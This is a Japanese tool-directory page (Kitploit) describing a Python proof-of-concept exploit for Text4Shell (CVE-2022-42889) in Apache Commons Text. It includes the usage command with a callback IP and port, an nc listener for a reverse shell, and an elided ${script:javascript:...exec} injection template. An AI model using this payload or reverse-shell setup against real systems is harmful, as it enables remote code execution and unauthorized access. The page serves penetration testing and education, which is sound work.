Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
text4shell-exploit — Apache Commons Text のバージョン 1.10 未満に存在する重大なリモートコード実行 (RCE) 脆弱性である Text4Shell (CVE-2022-42889) を標的とした、カスタム Python ベースの概念実証 (PoC) エクスプロイト。 | Kitploit
ツール/GitHubGitHub/syndicate27/text4shell-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubsyndicate27/text4shell-exploit

text4shell-exploit

Apache Commons Text のバージョン 1.10 未満に存在する重大なリモートコード実行 (RCE) 脆弱性である Text4Shell (CVE-2022-42889) を標的とした、カスタム Python ベースの概念実証 (PoC) エクスプロイト。

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

text4shell-exploit

Apache Commons Text のバージョン < 1.10 における重大なリモートコード実行の脆弱性である Text4Shell(CVE-2022-42889)を対象とした、カスタムの Python ベースの概念実証(PoC)エクスプロイトです。 このエクスプロイトは、補間が有効な StringSubstitutor クラスを使用する脆弱な Java アプリケーションを対象としており、${script:...} 式を注入して任意のシステムコマンドを実行できるようにします。

この PoC では、data クエリパラメータを介した悪用を示しています。ただし、脆弱なパラメータ名は実装によって異なる場合があります。ユーザーは、ターゲットアプリケーションのロジックに基づいてペイロードとリクエストパスを適宜調整してください。

免責事項: このエクスプロイトは、教育および許可されたペネトレーションテストの目的でのみ提供されます。責任を持って、自己責任で使用してください。

説明

これは、Text4Shell(CVE-2022-42889)として知られる Apache Commons Text の脆弱性に対するカスタム Python3 エクスプロイトです。ユーザー入力が StringSubstitutor によって動的に評価されるとき、安全でないインターポレータを介したリモートコード実行(RCE)を可能にします。

テスト済み:

  • Apache Commons Text < 1.10.0
  • 信頼されていない入力から ${script:...} 補間を使用する Java アプリケーション

使用法

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

例

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

攻撃マシンでリスナーをセットアップしてください:

nc -nlvp 4444

ペイロードロジック

スクリプトは以下を注入します:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

リバースシェルは、POST リクエストを使用して /data パラメータ経由で送信されます。

ツールをダウンロード